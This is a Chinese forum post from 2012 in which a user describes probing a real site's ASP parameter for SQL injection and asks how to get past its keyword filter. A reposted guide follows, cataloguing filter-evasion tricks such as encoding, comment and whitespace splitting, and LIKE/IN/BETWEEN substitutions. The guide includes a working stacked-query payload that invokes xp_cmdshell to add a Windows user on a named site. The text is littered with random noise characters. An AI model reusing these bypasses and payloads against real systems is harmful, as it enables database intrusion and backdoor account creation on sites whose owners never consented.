路过这个网站,检测了一下.
3 p: P. m1 D, K" X/ Zhttp://www.xxx.cn/Article.asp?ID=117 and 1=1* q9 n) R6 E: x4 c+ p( h* ?+ R& Q
直接返回主页
- O* C' h1 G( d7 Fhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
1 w8 Z$ _! |5 f4 n/ ~' a直接返回主页
$ A2 d4 x" L. G' u" V2 s$ U4 whttp://www.xxx.cn/Article.asp?ID=117 or
" V: }) B' y) h. r% s, u4 q没有返回主页 没有过滤or. N5 v1 A# B5 K. K) U0 y8 K' R+ m
http://www.xxx.cn/Article.asp?ID=117 and
$ Q5 Y2 o* w' a2 ^, ^, A直接返回主页 看来过滤了and
* j2 S6 ?( B) o5 W. o* P; g3 Xhttp://www.xxx.cn/Article.asp?ID=117 or 15 e7 i' L* p) P9 T" @
没有返回主页 即没有过滤or 也没有过滤1
4 N5 S+ _6 f8 d0 c6 Ohttp://www.xxx.cn/Article.asp?ID=117 or 1=1
' N+ E ^4 q# r* S) Q( K M8 `+ t直接返回主页 很明显过滤了等号
% a; s W5 I1 O1 [; {- m. ]or的特性是与and相反的.
# R: F0 q8 a) B' sor 1=1 爆错 或与原页面不同, O3 g0 P* n2 j8 z0 P
or 1=2 原页面相同; H4 J& [! w. S- [2 ?
这样就是一个注入点
1 h7 \: W* I' _" L: B) f7 r' \但他过滤了=号 我就用><号代替=号吧!* M/ R6 C: f$ r" {! O! y
or 1<2 很明显是正确的,所以应该与原页面不同' p7 A# Z% v7 P+ Q& [7 `' s* g
or 1>2 很明显是错误的,所以应该与原页面相同
7 x) b0 A( G0 n9 X然后看看有没有过滤其他的查询语句,比如select.1 K/ {8 ]4 {! ~# D
http://www.xxx.cn/Article.asp?ID=117 select
8 e' B% m$ C0 S5 t直接返回主页
: B7 S$ c4 K) S, v6 s+ j又迷茫了..* L0 j* C( r$ w! Y; M
4 [( d+ ]1 E, v; {
4 r# L* O7 x0 }; L) q1 x0 W vcookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗 W; J8 b9 x1 w# e, f7 Q* z/ m
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
% `) D- p" ?( j' N/ q================================================
/ E* o; {" p6 _% Q( }以下是转贴:8 t" n4 ]2 \0 F+ D x
6 W8 r/ R- a9 z4 k' E4 F% A* R
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 0 v9 ? u! i$ P) Q$ |" @3 m# d/ B
经过我的收集,大部分的防注入程序都过滤了以下关键字: 8 m/ w6 I3 _' _ N0 m0 E
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = . @& @ f4 J& A3 u/ c
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
; T! _) s" u$ H7 S( B对于关键字的过滤,以下是我收集的以及我个人的一些想法。 ' _! i8 H1 |( g1 T+ l' C3 }' r V
1、运用编码技术绕过 4 b: e# K1 z' q# J) ?$ K
如URLEncode编码,ASCII编码绕过。例如or 1=1即
+ s/ V8 G* i$ Y/ S2 J! I# }; e%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 / q$ | T2 H/ C* ?* e9 w: @/ T+ c& X
8 B4 ^8 K5 j- j2 d2、通过空格绕过
5 z! C/ @# ^% p, N9 T1 m+ d如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 / [7 z0 x3 w3 P+ q' L; j# w
or’ swords’ =‘swords’
* M& i+ r; Q" F$ ]/ E2 s,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
5 K7 S" d( r" ]: ^, C3、运用字符串判断代替 2 e/ Z. q: j2 Y5 q/ \" a" y3 ]9 }
用经典的or 1=1判断绕过,如
1 a6 H! E) s5 O" a# g8 Sor ’swords’ =’swords’
; B- g4 v( |& s# }# S% Y,这个方法就是网上在讨论的。
1 r+ n+ r+ h9 s" T5 R" V4、通过类型转换修饰符N绕过
. ^; H% N+ ] ^( G可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 * o0 ]& Z4 G. d
5、通过+号拆解字符串绕过
6 J6 {) m8 Q% b$ ]: L效果值得考证,但毕竟是一种方法。如 # l/ ~9 z1 x, Y/ W
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
! V% p6 [( T1 k. @' d
% i7 l0 W9 }9 W9 X6 q6、通过LIKE绕过 5 n. e: n5 C2 _. o4 k' V
以前怎么就没想到呢?如or
3 @& O9 }7 `: [# S5 V’swords’ LIKE ’sw’ ( u' O# `' x$ U g
!!!显然可以很轻松的绕过
/ [0 \( O7 R! a$ ^( [# @“=”“>”
% k/ C8 S: P, B/ W5 @的限制……
5 C: M O4 N- r1 p7、通过IN绕过
?6 u: E3 M& x- ]% [# X与上面的LIKE的思路差不多,如 8 Y- `; w: L' q; ]$ F% R+ C. T0 c
or ’swords’ IN (’swords’) * z7 J# `8 y4 g7 B- O8 |* t
Q! O) h" i5 P) ^7 P3 O8、通过BETWEEN绕过 & u# ?! U; y" ~4 ^& |- g9 _
如
( n$ y: S# ?5 ror ’swords’ BETWEEN ’rw’ AND ’tw’
& {7 B9 c6 B( X
8 ?2 p* B8 w0 L' l/ c9、通过>或者<绕过
9 f- z3 {6 h! B* U7 o9 G) cor ’swords’ > ’sw’ 2 Z" A4 V' x) |* C$ s3 ^/ V- N
or ’swords’ < ’tw’
4 C) ~8 g7 \# p0 L; Tor 1<3
2 e9 q8 \6 Y5 }, ~. j5 R+ A$ ?4 j……
5 A/ ~1 o/ C+ L" o8 H& S$ {10、运用注释语句绕过 / E- N4 C( \5 @2 i/ I
用/**/代替空格,如: $ Z0 G# h# F5 Y7 w/ Y
UNION /**/ Select /**/user,pwd,from tbluser
8 E' y/ f n a3 ]* a/ o& b2 H( g& {) I( }3 O7 T& D
用/**/分割敏感词,如:
2 s% I$ C! J1 b$ }' d, k* ~& XU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
. H& Y# s; C1 t
9 f% C: y( u) D) G" I- l11、用HEX绕过,一般的IDS都无法检测出来 7 ~1 I; O* J, i+ \& n
0x730079007300610064006D0069006E00 =hex(sysadmin)
5 M5 y4 g, O1 t! B( l9 E. \4 J y0x640062005F006F0077006E0065007200 =hex(db_owner) 5 K: f6 |0 J" {
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: * n! R4 d" [( }& R
declare @a sysname
7 h8 M3 X4 `- E4 m8 F( ^ select @a=
5 d& M& i1 u1 O) p3 a p exec master.dbo.xp_cmdshell @a / q9 e: h& I8 F$ O, z k$ `
效果
# W0 e8 ~0 _! r) u# `+ o' Khttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- 4 w% q1 G' r& l% n8 V2 _# `6 l6 t
9 a' l$ e. Q2 h# h其中的 : {: C2 F9 ?) u8 k$ U9 U
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
0 @5 |) h8 n4 a* l9 w就是
: y! Q, s% |7 s2 j. {% _“net user angel pass /add”
7 Z0 M; N$ J' c) c( W; C
( w% U$ H( s" s. X$ W( k一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。. F5 e7 U3 H" h) G' F3 n A
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
- X/ L* ]0 K: B; F' G另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
( M7 u7 [- Y: D% U2 e$ S/ ]7 QCopy code% @3 I9 e8 m: E0 b2 W, |# o9 Z
select * from table exec xp_cmdshell'xxxxxxxxxx'1 ?7 o# i6 R6 U6 z. V
% K& p3 l6 z `, O& B, O
# P. m& B' U0 G0 D5 D% F
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
( [9 `5 L% d, F* x* C' F6 N( M7 f7 F
, t+ O! o4 j$ e3 N+ B' f& u/ K; l% G) r4 O0 P
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'$ s5 r0 u# B7 n0 D0 f9 b
$ `/ M: P9 T/ C! V: G6 j
7 i6 c) X; Q! S# e8 P( b
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
8 D l, c$ |, } X
3 y+ U! m- I/ }: `5 _/ D) G的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?* A' {" U4 V$ t/ j; a0 R
8 r, V7 d! L I这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
2 K( e5 m) ^2 R" w- x8 @6 ^2 ^可能大家早就知道了,不管怎么说,发在这里吧!. x. \$ N" h7 h: _( s
; D% E R" o1 K# a3 W! R6 H( J8 n
最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。0 t/ a8 s5 M" R
& J/ d5 `* E% Q+ y* p! c$ g+ G, }& C. P+ s5 F+ A
! O7 f! V' \1 K% H# |5 j9 D- V2 E
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
/ ]1 M/ r0 ?8 g* X' K8 x比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
* h! M4 M. I; @/ A, y# t4 ~8 W4 E+ V1 O
|
发表于 2012-9-15 14:47:46
收藏
支持
反对